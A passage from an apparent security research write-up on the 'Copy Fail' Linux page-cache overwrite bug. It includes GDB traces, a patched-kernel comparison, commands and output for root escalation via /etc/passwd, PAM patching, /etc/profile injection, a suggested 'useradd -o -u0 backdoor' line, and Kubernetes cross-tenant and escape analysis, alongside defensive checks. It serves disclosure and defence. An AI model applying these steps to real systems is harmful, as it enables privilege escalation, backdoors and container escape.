4.3.2 Experiment 1: Verifying Page-Cache Writes
Inside the QEMU VM shell, run the automated experiment:
# === inside the VM ===
# 1. Create a test file.
echo "AABBCCDD EEFFGGHH IIJJKKLL MMNNOOPP" > /tmp/target.txt
hexdump -C /tmp/target.txt
# 00000000 41 41 42 42 43 43 44 44 20 45 45 46 46 47 47 48 |AABBCCDD EEFFGGH|
# 00000010 48 20 49 49 4a 4a 4b 4b 4c 4c 20 4d 4d 4e 4e 4f |H IIJJKKLL MMNNO|
# 00000020 4f 50 50 0a |OPP.|
# 2. First write: offset 0, value 0xDEADBEEF.
poc_pagecache_write /tmp/target.txt 0 0xDEADBEEF
# [*] Target: /tmp/target.txt
# [*] Offset: 0 (0x0)
# [*] Value: 0xdeadbeef
# [*] Writing 4 bytes to page cache...
# [+] Done. Page cache of /tmp/target.txt at offset 0 should now contain 0xdeadbeef
# 3. Verify the result.
hexdump -C /tmp/target.txt | head -2
# 00000000 ef be ad de 43 43 44 44 20 45 45 46 46 47 47 48 |....CCDD EEFFGGH|
# ^^^^^^^^^^^
# 0xDEADBEEF (little-endian)
# 4. Second write: offset 8, value 0xCAFEBABE.
poc_pagecache_write /tmp/target.txt 8 0xCAFEBABE
# 5. Verify that the two writes do not interfere with each other.
hexdump -C /tmp/target.txt | head -2
# 00000000 ef be ad de 43 43 44 44 be ba fe ca 46 47 47 48 |....CCDD....FGGH|
# ^^^^^^^^^^^
# 0xCAFEBABE (little-endian)
# 6. Verify drop_caches behavior. Files on tmpfs do not revert.
echo 3 > /proc/sys/vm/drop_caches
hexdump -C /tmp/target.txt | head -2
# 00000000 ef be ad de 43 43 44 44 be ba fe ca 46 47 47 48 |....CCDD....FGGH|
# On tmpfs: data only lives in page cache, and drop_caches does not evict it.
# On disk filesystems such as ext4: drop_caches reloads the original data from disk.
Conclusion: the four-byte page-cache write primitive works. The offset is precise, and repeated writes do not interfere with each other.
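The byte order seen in the hexdump output follows from how a 32-bit integer is laid out in memory on a little-endian machine. A quick check, assuming the test utility stores the value as a native little-endian u32:

```python
import struct

first = struct.pack("<I", 0xDEADBEEF)    # little-endian 32-bit layout
second = struct.pack("<I", 0xCAFEBABE)

first_hex = first.hex(" ")
second_hex = second.hex(" ")
print(first_hex)     # ef be ad de
print(second_hex)    # be ba fe ca
```

These match the bytes at offsets 0 and 8 in the dumps above.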
4.3.3 Experiment 2: GDB Evidence Chain, SGL Layout, and Scratch Write
This is the most important validation step. GDB observes req->src == req->dst at the entry of crypto_authenc_esn_decrypt, proving that the vulnerable in-place path is active, and then traces the write operation in scatterwalk_map_and_copy until it lands on a page-cache page.
# === terminal 1: start QEMU in debug mode ===
./run_qemu.sh debug
# === Debug mode: QEMU paused, waiting for GDB on localhost:1234 ===
# === terminal 2: connect GDB and load the Python breakpoint script ===
gdb ./vmlinux -x exp3_2_gdb.py
# [GDB Script] Setting up breakpoints for Experiment 3.2+3.3...
# Breakpoint 1 at 0xffffffff812984f8: file crypto/authencesn.c, line 263.
# [GDB] BP1: crypto_authenc_esn_decrypt (entry)
# Breakpoint 2 at 0xffffffff8128f93e: file crypto/scatterwalk.c, line 57.
# [GDB] BP2: scatterwalk_map_and_copy (writes only)
(gdb) target remote :1234
(gdb) continue
After running poc_pagecache_write /tmp/target.txt 0 0xDEADBEEF inside the VM, GDB captures the following output:
============================================================
=== crypto_authenc_esn_decrypt ENTRY ===
req = 0xffff888002d96a90
req->src = 0xffff888002d96820
req->dst = 0xffff888002d96820
src == dst: YES (IN-PLACE!) <- root cause confirmed
assoclen = 8
cryptlen = 4 (before -= authsize)
============================================================
--- dst SGL entries ---
SGL[0]: page_link=0xffffea000006f440 offset=1760 length=8
SGL[1]: page_link=0xffff8880027cbda1 offset=0 length=0 [CHAIN]
SGL[2]: page_link=0xffffea000006f8c2 offset=0 length=4 [LAST]
=== [HIT 1] scatterwalk_map_and_copy WRITE ===
buf=0xffffc90000113d20 sg=0xffff888002d96820 start=4 nbytes=4
writing value: 0x41414141
backtrace:
#0 scatterwalk_map_and_copy
#1 crypto_authenc_esn_decrypt <- seqno_hi written to dst[4..7]
#2 _aead_recvmsg
#3 aead_recvmsg
#4 sock_recvmsg_nosec
#5 sock_recvmsg
=== [HIT 2] scatterwalk_map_and_copy WRITE ===
buf=0xffffc90000113d24 sg=0xffff888002d96820 start=8 nbytes=4
writing value: 0xdeadbeef <- scratch write hits page cache
backtrace:
#0 scatterwalk_map_and_copy
#1 crypto_authenc_esn_decrypt <- dst[assoclen+cryptlen] = dst[8+0] = page cache
#2 _aead_recvmsg
...
=== [HIT 3] scatterwalk_map_and_copy WRITE ===
buf=0xffffc90000113cc8 sg=0xffff888002d96820 start=0 nbytes=8
writing value: 0x41414141
backtrace:
#0 scatterwalk_map_and_copy
#1 crypto_authenc_esn_decrypt_tail <- ESN header restore after HMAC cleanup
...
Key interpretation:
| Field | Meaning |
|---|---|
| src == dst: YES | Confirms in-place mode introduced by 72548b093ee3. |
| SGL[1]: [CHAIN] | sg_chain() linked tag pages to the RX SGL. |
| SGL[2]: offset=0 length=4 [LAST] | The tag page is the file's page-cache page at offset 0. |
| HIT 2: value=0xdeadbeef start=8 | The scratch write targets dst[8], exactly the start of the chained tag page. |
The SGL layout and call chain are fully captured: recv() -> _aead_recvmsg -> crypto_authenc_esn_decrypt -> scatterwalk_map_and_copy(WRITE) -> page cache.
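The [CHAIN] and [LAST] annotations in the dump come from the two low bits of page_link, which the kernel uses as flags (SG_CHAIN = 0x01 and SG_END = 0x02 in include/linux/scatterlist.h). The sketch below decodes the three page_link values from the vulnerable-kernel output; decode_page_link is a hypothetical helper, not part of the GDB script.

```python
SG_CHAIN = 0x01   # entry links to another scatterlist array
SG_END = 0x02     # entry is the last one in the list
SG_FLAG_MASK = SG_CHAIN | SG_END


def decode_page_link(page_link: int) -> dict:
    """Separate the pointer bits of page_link from the two flag bits."""
    return {
        "pointer": page_link & ~SG_FLAG_MASK,
        "chain": bool(page_link & SG_CHAIN),
        "last": bool(page_link & SG_END),
    }


entries = [0xffffea000006f440, 0xffff8880027cbda1, 0xffffea000006f8c2]
decoded = [decode_page_link(raw) for raw in entries]
for index, info in enumerate(decoded):
    print(f"SGL[{index}]: pointer={info['pointer']:#x} "
          f"chain={info['chain']} last={info['last']}")
```

SGL[1] has the chain bit set and SGL[2] has the end bit set, which is what the breakpoint script labels show.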
4.3.4 Experiment 3: Comparing with the Patched Kernel
Under the same environment, boot a 6.12.85 kernel containing patch a664bf3d603d and repeat the experiment:
# Start with the patched kernel.
BZIMAGE=bzImage.patched VMLINUX=vmlinux.patched ./run_qemu.sh debug
GDB output after the fix:
============================================================
=== crypto_authenc_esn_decrypt ENTRY ===
req = 0xffff888002dcea90
req->src = 0xffff888002e6d880
req->dst = 0xffff888002dce820
src == dst: NO <- fixed: out-of-place mode
assoclen = 8
cryptlen = 4 (before -= authsize)
============================================================
--- dst SGL entries ---
SGL[0]: page_link=0xffffea000006f582 offset=1760 length=8 [LAST]
^^^^
Only one entry: no CHAIN and no page-cache page.
=== [HIT 1] scatterwalk_map_and_copy WRITE ===
writing value: 0x41414141
sg->page_link = 0xffffea000006f582 <- RX buffer, safe
=== [HIT 2] scatterwalk_map_and_copy WRITE ===
writing value: 0xdeadbeef
sg->page_link = 0xffffea000006f582 <- RX buffer again, harmless
| Item | Vulnerable kernel (6.12.8) | Patched kernel (6.12.85) |
|---|---|---|
| src == dst | Yes, in-place | No, out-of-place |
| dst SGL entries | 3 entries, including CHAIN and a page-cache page | 1 entry, RX buffer only |
| scratch-write target | page-cache page | RX buffer |
| page cache after execution | modified | unchanged |
5. A Recurring Vulnerability Pattern: Page-Cache Overwrite
Dirty Pipe in 2022, Copy Fail in 2026, and the later Dirty Frag bugs share a clear pattern: splice() zero-copy injects file page-cache page references into a kernel subsystem, and a code path in that subsystem writes to those references. The concrete writes differ: pipe merge, crypto scratch write, and in-place decrypt. The result is the same: file page cache is modified without going through the VFS write path.
| Vulnerability | Year | Mechanism | Deterministic write | Page-cache only |
|---|---|---|---|---|
| Dirty Pipe (CVE-2022-0847) | 2022 | pipe flag initialization bug plus splice | Yes | Yes |
| Copy Fail (CVE-2026-31431) | 2026 | AF_ALG in-place optimization plus splice | Yes | Yes |
| Dirty Frag (CVE-2026-43284/43500) | 2026 | xfrm-ESP / RxRPC in-place decryption plus splice | Yes | Yes |
Their trigger paths differ, but the core result is shared: a kernel path bypasses VFS write-permission checks and directly modifies file page-cache content through page references injected by splice. Because the modification does not pass through the VFS write path, the page is not marked dirty. The original file on disk is unaffected. The tampering exists only in memory and disappears after reboot or drop_caches.
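One way to observe the memory-only property is to read the same range twice: once through the page cache and once with O_DIRECT, which on many local filesystems bypasses clean cached pages and reads from the backing device. The sketch below rests on that assumption. The helper names are hypothetical, and O_DIRECT support, alignment rules, and behavior on overlayfs or network filesystems vary, so treat a mismatch as a hint rather than proof.

```python
import mmap
import os

BLOCK = 4096  # assumed to satisfy the filesystem's O_DIRECT alignment rules


def read_cached(path, size=BLOCK):
    """Ordinary buffered read: served from the page cache when present."""
    with open(path, "rb") as f:
        return f.read(size)


def read_direct(path, size=BLOCK):
    """O_DIRECT read into a page-aligned buffer (Linux only)."""
    fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    try:
        buf = mmap.mmap(-1, size)      # anonymous mappings are page-aligned
        n = os.readv(fd, [buf])
        data = bytes(buf[:n])
        buf.close()
        return data
    finally:
        os.close(fd)


def first_difference(cached, on_disk):
    """Return the first differing byte offset, or None if the data matches."""
    for i, (a, b) in enumerate(zip(cached, on_disk)):
        if a != b:
            return i
    if len(cached) != len(on_disk):
        return min(len(cached), len(on_disk))
    return None
```

If first_difference(read_cached(p), read_direct(p)) returns an offset for a file that nobody has legitimately written, the cached copy and the on-disk copy have diverged.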

The older Dirty COW vulnerability achieved a similar unauthorized file-data modification through a different mechanism: an mmap copy-on-write race plus GUP. Dirty COW does not involve splice or in-place operation. After the race succeeds, the modified page is marked dirty and written back to disk. It is a different class of bug.
Once the primitive is equivalent, the exploitation surface is also similar. The following sections use Copy Fail as the example primitive: a four-byte controlled write to the page cache of any readable file. All paths below were experimentally confirmed on CentOS Stream 8 with an unpatched 4.18.0-553 kernel, and the conclusions apply to page-cache overwrite bugs of the same class.
Experiment code
The PoC scripts for host attacks are part of the page-cache guard experiment set. URL links have been removed from this blog version.
5.1 /etc/passwd UID Tampering
/etc/passwd is world-readable (mode 0644) by default on mainstream Linux distributions, making it a natural target.
The idea is to change the UID field of a target user from 1000 to 0000, which only requires changing one ASCII digit. Linux identifies root by UID 0.
# Before: testuser123:x:1000:1000::/home/testuser123:/bin/bash
python3 exp_passwd_uid.py testuser123
# [+] SUCCESS: UID changed to 0000 in page cache
id testuser123
# uid=0(root) gid=0(root) groups=0(root)
su - testuser123
# whoami -> root
# /etc/shadow is readable
# Restore.
echo 3 > /proc/sys/vm/drop_caches
A single four-byte write is enough for privilege escalation. No shellcode or ELF knowledge is needed, and the path is distribution-independent. Since PG_dirty is not set, drop_caches restores the original content.
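Because the UID field is parsed as a number, 0000 is the same identity as 0. A defensive counterpart to this experiment is to scan passwd data for accounts other than root whose UID parses to zero. The sketch below assumes the standard colon-separated passwd format; uid_zero_accounts is a hypothetical helper name and the sample entries are illustrative.

```python
def uid_zero_accounts(passwd_text):
    """Return names of non-root accounts whose UID field parses to 0."""
    hits = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue                      # malformed entry, skip it
        name, uid = fields[0], fields[2]
        if uid.isdigit() and int(uid) == 0 and name != "root":
            hits.append(name)
    return hits


sample = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "testuser123:x:0000:1000::/home/testuser123:/bin/bash\n"
    "daemon:x:2:2:daemon:/sbin:/sbin/nologin\n"
)
print(uid_zero_accounts(sample))  # ['testuser123']
```

An ordinary read of /etc/passwd is served from the page cache, so a scan like this sees the same tampered view that login-time lookups see.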
5.2 PAM Authentication Bypass
pam_unix.so is the standard Linux password-authentication module and is usually 0644.
The idea is to modify the password-check path in pam_sm_authenticate: replace mov %eax,%ebp (89 c5), which saves the real return value, with xor %ebp,%ebp (31 ed), forcing the function to return PAM_SUCCESS (0):
; after password verification, save the return value
0x3d5e: 89 c5 mov %eax, %ebp ; original: save real verification result
; patched to:
0x3d5e: 31 ed xor %ebp, %ebp ; tampered: clear to zero = PAM_SUCCESS
python3 exp_pam_bypass.py
# [*] Auto-detected patch offset: 0x3d5e
# [*] Patching to: 31ede95e (xor %ebp,%ebp)
# [+] SUCCESS: pam_unix.so patched in page cache
su root
# Password: any input
# whoami -> root
Persistence detail. Processes such as sshd, login, and sd-pam load pam_unix.so through mmap(MAP_PRIVATE). These mappings keep references to the modified page, preventing drop_caches from evicting it. During invalidate_inode_page(), the kernel sees page_mapped() and skips eviction. The modification persists until all mapping processes exit or the file's inode is replaced, for example through yum reinstall pam.
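To estimate how long such a modification would persist, it helps to know which processes currently map the file. The sketch below scans /proc/<pid>/maps for a given path. The helper names are hypothetical, the library path in the sample is illustrative, and reading the maps of other users' processes normally requires root.

```python
import glob


def maps_reference(maps_text, path):
    """True if any line of a /proc/<pid>/maps dump is backed by path."""
    for line in maps_text.splitlines():
        # Columns: address perms offset dev inode pathname
        fields = line.split(None, 5)
        if len(fields) == 6 and fields[5].strip() == path:
            return True
    return False


def pids_mapping(path):
    """Return the PIDs whose address space maps the given file."""
    pids = []
    for maps_file in glob.glob("/proc/[0-9]*/maps"):
        try:
            with open(maps_file) as f:
                if maps_reference(f.read(), path):
                    pids.append(int(maps_file.split("/")[2]))
        except OSError:
            continue                      # process exited or access denied
    return sorted(pids)


sample = (
    "7f2a10000000-7f2a10010000 r-xp 00000000 fd:00 1234   /usr/lib64/security/pam_unix.so\n"
    "7f2a20000000-7f2a20021000 rw-p 00000000 00:00 0 \n"
)
print(maps_reference(sample, "/usr/lib64/security/pam_unix.so"))  # True
```

An empty result from pids_mapping() suggests that drop_caches would be able to evict the page. A non-empty result lists the processes that would have to exit first.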
5.3 Live-Patching Shared Libraries
Linux loads .so shared libraries through mmap(MAP_PRIVATE). Processes using the same library share the same physical page-cache pages until a process writes to a page and receives a private copy. Modifying the page cache of a .so file is therefore equivalent to modifying the code or data seen by all running processes that have mapped that library and have not privately copied the affected page. x86 cache coherence makes the write immediately visible to instruction and data fetches on all cores.
The experiment uses libnss_files.so, the system NSS name-resolution library, which is 0644, and a long-running monitor process:
# Step 1: start a monitor process that keeps reading a string from its mmap mapping.
gcc -o monitor exp_shared_lib_monitor.c -ldl
./monitor &
# [monitor] PID=161045
# [monitor] initial: "/etc/hosts"
# [monitor] tick 1: no change
# [monitor] tick 2: no change
# Step 2: tamper with the .so page cache from another terminal.
python3 exp_shared_lib.py
# [+] SUCCESS: '/etc/hosts' -> '/etc/h0sts' in page cache
# Step 3: the monitor sees the change without restart.
# [monitor] tick 3: *** STRING CHANGED ***
# [monitor] now: "/etc/h0sts"
# [monitor] *** LIVE-PATCH CONFIRMED (no restart) ***
The key evidence is that monitor process PID 161045 never restarts. It reads the original value during ticks 1 and 2, then immediately sees the modified string at tick 3 after the PoC runs.
On CentOS 8, more than twenty system daemons, including sshd, crond, dockerd, and dbus-daemon, hold mmap references to libnss_files.so. drop_caches cannot evict the modified page. The modification remains semi-persistent while the system is running, and recovery requires replacing the file, for example with yum reinstall glibc-common.
Risk note
Modifying the code section of core system libraries such as libc.so can theoretically lead to arbitrary code execution in root daemons that call the modified function, but it carries a high risk of crashing the system. The experiment above only modified a string in the .rodata section as a safer validation.
5.4 /etc/profile Command Injection
/etc/profile is 0644 on Linux distributions and is automatically sourced by every login shell, including SSH login, su -, and console login.
The idea is to use an existing comment line as cover. The injected command overwrites part of the comment, and the remaining original text is commented out by #, leaving the rest of the file functional:
# Original: # It's NOT a good idea to change this file unless you know what you
# Injected: id>>/tmp/CF-PWNED #ea to change this file unless you know what you
# command part '#' comments out the remaining text
python3 exp_profile_inject.py "id>>/tmp/CF-PWNED #"
# [*] Payload: 20 bytes, 5 writes
# [+] SUCCESS: command injected into /etc/profile
# Trigger: root starts a login shell.
su - root -c "echo triggered"
cat /tmp/CF-PWNED
# uid=0(root) gid=0(root) groups=0(root)
Only five writes, twenty bytes total, are needed. This path is highly portable because every distribution has /etc/profile, and it usually contains comment lines. A real attack could inject a reverse shell or a backdoor-user creation command, for example useradd -o -u0 backdoor #.
5.5 Tampering Scheduled-Task Scripts
Cron jobs and systemd services often reference scripts or binaries that are world-readable. They are passive targets: after tampering, the attacker only waits for the daemon's next scheduled execution.
# Setup: a cron job runs /tmp/copyfail-lab/cron_target.sh every minute.
# Script content: echo "ORIGINAL $(date +%s)" >> cron.log
# Tamper with the script page cache.
python3 exp_cron_script.py /tmp/copyfail-lab/cron_target.sh
# [+] SUCCESS: script tampered in page cache ("ORIGINAL" -> "HIJACKED")
# Next cron trigger, within one minute:
tail /tmp/copyfail-lab/cron.log
# HIJACKED 1778309461 <- crond executed the tampered script
crond spawns a fresh shell each time the job fires, and that shell reads the script through the page cache, so it naturally consumes the tampered data. The same applies to service scripts referenced by systemd.
Configuration files versus script files
Directly modifying cron configuration files in /etc/cron.d/ or systemd unit files in page cache is technically possible, but it is not practical in real attacks. cronie uses inotify to detect configuration changes, and page-cache modification does not trigger inotify. crond must restart to read the change. Systemd unit-file changes also require systemctl daemon-reload or a service restart. A low-privilege attacker cannot normally force these daemon operations. Practical attack paths are limited to scripts or binaries already referenced by existing jobs.
5.6 /etc/ld.so.preload Path Hijack
Shared libraries listed in /etc/ld.so.preload are loaded by the dynamic linker before normal libraries for every newly started program. Modifying a listed path gives global code injection.
# Precondition: /etc/ld.so.preload already exists, for example for performance monitoring.
cat /etc/ld.so.preload
# /tmp/copyfail-lab/libmarker.so
python3 exp_preload_hijack.py
# [+] SUCCESS: preload path hijacked
# /tmp/copyfail-lab/libmarker.so -> /tmp/copyfail-lab/libevil00.so
ls /dev/null
# [preload] EVIL LIBRARY LOADED! <- malicious library loaded by every new process
# /dev/null
Precondition: /etc/ld.so.preload must already exist. Copy Fail cannot create new files; it can only modify the page cache of existing files. The file is absent by default, but it commonly appears in environments using jemalloc preloading, LD_PRELOAD security agents, or performance-monitoring tools.
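Since the attack only rewrites an existing entry, a simple check is to compare the parsed preload list against a known baseline. The sketch below assumes glibc's format of whitespace- or colon-separated paths with # comments. The helper names and the baseline list are hypothetical.

```python
import re


def preload_entries(text):
    """Parse ld.so.preload content into a list of library paths."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]               # strip trailing comment
        entries.extend(p for p in re.split(r"[\s:]+", line) if p)
    return entries


def unexpected_entries(text, allowed):
    """Return listed libraries that are not in the allowed baseline."""
    allowed_set = set(allowed)
    return [p for p in preload_entries(text) if p not in allowed_set]


baseline = ["/tmp/copyfail-lab/libmarker.so"]
tampered = "/tmp/copyfail-lab/libevil00.so\n"
print(unexpected_entries(tampered, baseline))  # ['/tmp/copyfail-lab/libevil00.so']
```

The check reads the file through the page cache, so it reports what the dynamic linker would actually load, not what is stored on disk.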
6. Deep Dive into Container Scenarios
The previous section covered several host-side privilege-escalation paths. In containerized infrastructure, the threat goes further: Page Cache is global shared state that crosses container isolation boundaries. After disclosure, multiple security teams quickly examined container and Kubernetes environments. The results showed that PSS Restricted and RuntimeDefault do not block AF_ALG, production EKS clusters can reproduce the issue end to end, and a privileged DaemonSet that shares an image layer can be abused for Pod-to-Node escape. This section independently validates and extends those findings, focusing on practical exploitability boundaries.
All conclusions below were experimentally verified on a real Kubernetes cluster: k3s v1.32 with containerd v2.0.5, running CentOS Stream 8 with an unpatched 4.18.0-553 kernel.
Container experiment code
The Pod YAML files, PoC scripts, and validation tools are in the container experiment package. URL links have been removed from this blog version.
6.1 Image-Layer Sharing: Cross-Container Page-Cache Propagation
Container runtimes such as containerd and Docker use overlayfs to manage container filesystems. For the same base image, such as python:3.11-slim, the image layers are stored once on the host. All containers using that image have lower layers pointing to the same set of inodes.
This means that when container A reads /usr/bin/python3, the kernel creates a page-cache entry for that inode. When container B later reads the same file, it hits the exact same page-cache page.
One important boundary must be emphasized: Page Cache is global at kernel level, but its scope is one machine. Only containers on the same node can share overlayfs layers that point to the same inodes and therefore share page-cache pages. Containers on different nodes have independent page caches, even if they use the same image. This same-node condition is the fundamental prerequisite for all cross-container attack scenarios below.

Experiment: Cross-Container Page-Cache Sharing
Deploy the experiment and verify inode sharing:
# Deploy two Pods using the same base image.
kubectl create ns copyfail-lab
kubectl apply -f pod-cross-tenant.yaml
# Verify that both Pods share the same /etc/os-release inode.
kubectl exec -n copyfail-lab pod-attacker -- stat -c '%i' /etc/os-release
# 208483846
kubectl exec -n copyfail-lab pod-victim-same -- stat -c '%i' /etc/os-release
# 208483846 <- same inode = shared page cache
Run the page-cache write inside the attacker Pod:
# Run the PoC in the attacker Pod.
kubectl exec -n copyfail-lab pod-attacker -- python3 /poc_marker.py /etc/os-release
# [*] Target: /etc/os-release
# [*] Before: 50524554
# [*] After: deadbeef
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# Victim Pod using the same base image immediately sees the tampered bytes.
kubectl exec -n copyfail-lab pod-victim-same -- \
python3 -c "import os; print(os.pread(os.open('/etc/os-release',0),16,0).hex())"
# deadbeef54595f4e414d453d22446562
# [+] MARKER FOUND: page cache is SHARED with attacker pod!
# Control group using a different base image is unaffected.
kubectl exec -n copyfail-lab pod-victim-alpine -- head -c 16 /etc/os-release | xxd
# 00000000: 4e41 4d45 3d22 416c 7069 6e65 NAME="Alpine
Reading the corresponding file directly from the containerd snapshot directory on the host shows the same tampered data:
# Host reads the snapshot-layer file.
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562 ....TY_NAME="Deb
# drop_caches restores it.
echo 3 > /proc/sys/vm/drop_caches
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562 PRETTY_NAME="Deb
6.2 Zero-Privilege Cross-Tenant Attack

Based on the sharing mechanism above, we can validate a zero-privilege cross-tenant attack where attacker and victim run in completely separate namespaces:
# Create two isolated namespaces.
kubectl create ns copyfail-lab # attacker
kubectl create ns tenant-victim # victim
# Deploy the Pods. See pod-cross-tenant.yaml in the experiment package.
kubectl apply -f pod-cross-tenant.yaml
Prerequisite validation: confirm inode sharing
# Two Pods in different namespaces, same base image -> same inode.
kubectl exec -n copyfail-lab pod-attacker -- stat -c '%i' /bin/cat
# 1420102
kubectl exec -n tenant-victim victim-app -- stat -c '%i' /bin/cat
# 1420102 <- same inode, even across namespaces
Attack execution
# Step 1: verify that the victim's /bin/cat is normal.
kubectl exec -n tenant-victim victim-app -- \
python3 -c "import os; print(os.pread(os.open('/bin/cat',0),16,0).hex())"
# 7f454c46020101000000000000000000 (normal ELF header)
# Step 2: attacker runs Copy Fail without any special privilege.
kubectl exec -n copyfail-lab pod-attacker -- python3 /poc_marker.py /bin/cat
# [*] Before: 7f454c46
# [*] After: deadbeef
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# Step 3: victim immediately sees the effect.
kubectl exec -n tenant-victim victim-app -- \
python3 -c "import os; print(os.pread(os.open('/bin/cat',0),16,0).hex())"
# deadbeef020101000000000000000000
# ELF magic is corrupted.
# Step 4: victim service breaks.
kubectl exec -n tenant-victim victim-app -- cat /etc/hostname
# exec /usr/bin/cat: exec format error <- binary cannot execute
# Step 5: restore from the host.
echo 3 > /proc/sys/vm/drop_caches
kubectl exec -n tenant-victim victim-app -- cat /etc/hostname
# victim-app <- normal again
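The header check used in steps 1 and 3 can also be written as a small helper that closes its file descriptor and tests the ELF magic directly. This is a minimal sketch, and the function names are hypothetical.

```python
import os

ELF_MAGIC = b"\x7fELF"


def read_header(path, size=16):
    """Read the first bytes of a file through the normal (cached) read path."""
    fd = os.open(path, os.O_RDONLY)
    try:
        return os.pread(fd, size, 0)
    finally:
        os.close(fd)


def has_elf_magic(path):
    """True if the file currently starts with the 4-byte ELF magic."""
    return read_header(path, 4) == ELF_MAGIC
```

Calling has_elf_magic("/bin/cat") inside the victim Pod would be expected to return True before step 2 and False after it, mirroring the hex output shown in the steps.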
The key conclusion is that this attack requires no special capability, no hostPath mount, and no relaxed security context. The only prerequisites are an unpatched kernel and the ability to execute Python, or an equivalent C program, inside the container. The two Pods do not need network connectivity and do not need to know each other's IP address or name.
The experiment above corrupted a file used by a normal user Pod, so the impact is limited to cross-tenant denial of service. The natural next question is whether the same mechanism can be turned into a container escape: can a zero-privilege Pod obtain node-level control?
The answer depends on the target. From Section 6.1, page-cache tampering has two prerequisites: the attacker and the target container must be on the same node, and they must share at least one image layer. If the target container runs with privileged: true, then when a tampered binary executes inside it, the attacker's payload runs with full node-level privileges.
A DaemonSet is the natural candidate for satisfying both conditions. A DaemonSet runs one Pod replica on every node. No matter where the compromised Pod is scheduled, a DaemonSet instance is present on the same node. Kubernetes clusters often run privileged system DaemonSets such as kube-proxy, CNI plugins, and log collectors.
This likely explains why one public PoC selected kube-proxy as the target. In managed clusters such as ACK, EKS, and GKE, kube-proxy commonly runs as a privileged DaemonSet. That PoC tampers with the page cache of the ipset binary inside kube-proxy and waits for kube-proxy to execute it. To make the sharing deterministic, the attacker image is built with FROM registry.k8s.io/kube-proxy:v1.35.2, guaranteeing a shared image layer that contains ipset.
Finding Exploitable Targets: Layer-Sharing Analysis on a Node
Using FROM to match the target image makes the exploit deterministic. To evaluate exposure in a real environment, namely whether a normal business Pod naturally shares a layer with a privileged DaemonSet on the same node, analyze the node as follows:
# 1. List the running containers and their images on the node (this prints every container; check each one's security context to find the privileged ones).
crictl ps -o json | jq -r '.containers[] | "\(.id) \(.image.image) \(.metadata.name)"'
# 2. Compare layer digests between the business Pod image and the target DaemonSet image.
MY_IMAGE="python:3.11-slim"
TARGET_IMAGE="registry.k8s.io/kube-proxy:v1.35.2"
crictl inspecti $MY_IMAGE | jq -r '.info.imageSpec.rootfs.diff_ids[]' > /tmp/my_layers.txt
crictl inspecti $TARGET_IMAGE | jq -r '.info.imageSpec.rootfs.diff_ids[]' > /tmp/target_layers.txt
comm -12 <(sort /tmp/my_layers.txt) <(sort /tmp/target_layers.txt)
# Any output means a shared layer exists.
# 3. Confirm whether the target file is actually shared by both containers.
# Run this inside both containers.
stat -c '%d:%i' /usr/sbin/ipset # device:inode
# Same output in both containers confirms page-cache sharing.
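Step 2 above is a set intersection over layer digests. A Python equivalent is sketched here. The JSON path follows the jq expression used above, while the function names and the shortened digests are hypothetical.

```python
import json


def diff_ids(inspect_json):
    """Extract layer diff_ids from the JSON printed by crictl inspecti."""
    return json.loads(inspect_json)["info"]["imageSpec"]["rootfs"]["diff_ids"]


def shared_layers(mine, target):
    """Return digests present in both images, in the order of the first image."""
    target_set = set(target)
    return [layer for layer in mine if layer in target_set]


# Hypothetical digests, shortened for readability.
mine = ["sha256:aaa", "sha256:bbb", "sha256:ccc"]
target = ["sha256:aaa", "sha256:ddd"]
print(shared_layers(mine, target))  # ['sha256:aaa']
```

An empty list means the two images have no layer in common, so no file in them can share a page-cache page through overlayfs.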
If the shared object is a base library such as ld-linux-x86-64.so.2 or libc.so.6, the theoretical attack surface is larger because every binary loads it. In practice, replacing a whole .so file requires overwriting every four-byte window and is slow. If any process loads the .so during partial overwrite, it can crash. Core libraries are depended on by many processes, so tampering with libc.so.6 is more likely to cause widespread container crashes than stable code execution.
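The cost of a full overwrite follows from simple arithmetic. The sketch below assumes non-overlapping four-byte windows that start at the first byte to be changed; the 2 MiB library size is a hypothetical figure chosen for illustration.

```python
WINDOW = 4  # bytes changed per invocation, as described in the text


def writes_needed(length, window=WINDOW):
    """Number of fixed-size writes required to cover `length` bytes."""
    if length < 0:
        raise ValueError("length must be non-negative")
    return (length + window - 1) // window


print(writes_needed(20))               # 5, the /etc/profile payload in Section 5.4
print(writes_needed(2 * 1024 * 1024))  # 524288, for a hypothetical 2 MiB library
```

A short, targeted patch needs a handful of writes. Replacing a whole library needs hundreds of thousands, during which any process that loads the file sees a half-modified image.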
Challenges in Real Attacks
The analysis above requires node-level visibility through crictl and direct access to containerd storage. In a real attack, an attacker usually obtains only a shell inside a normal Pod through RCE. They cannot directly see which containers run on the same node, which images they use, or whether layer digests match. This means the attacker cannot complete the analysis in the target environment and must rely on inference or blind attempts.
Blindly trying Copy Fail against files in the target environment is a poor strategy. Each four-byte overwrite is irreversible unless an administrator drops the cache. If the guessed target file or layer-sharing relation is wrong, the attacker only corrupts a binary inside the compromised container. That may expose the intrusion or crash the container and lose the foothold.
A more realistic exploitation model is targeted exploitation against a known business environment. Once the attacker compromises a container, the application itself reveals the framework, middleware, base-image family, and version. The attacker can reproduce a similar environment locally with the same image and Kubernetes distribution, perform white-box analysis, identify privileged containers, confirm layer sharing, locate an exploitable shared file, and debug the payload. They then return to the target environment with a deterministic one-shot exploit.
6.3 Can It Escape Directly to the Host?
The previous section discussed cross-container escalation: tampering with a binary used by a privileged DaemonSet to indirectly obtain node privileges. That depends on shared layers and later execution inside the target container. A more aggressive question is whether we can skip the intermediate container entirely and make a host process execute tampered page-cache data directly.
Copy Fail can tamper with the page cache of any readable file, but data tampering alone is not enough. A host process must load and execute the tampered data in its own privilege context. A plain read() is not an escape. The read data must be used as code, for example through execve(), dlopen(), or an interpreter that jumps into parsed content.
First, however, we need to answer a simpler question: if a host process accesses a file whose page cache was tampered with, does it load original disk content or tampered page-cache content?
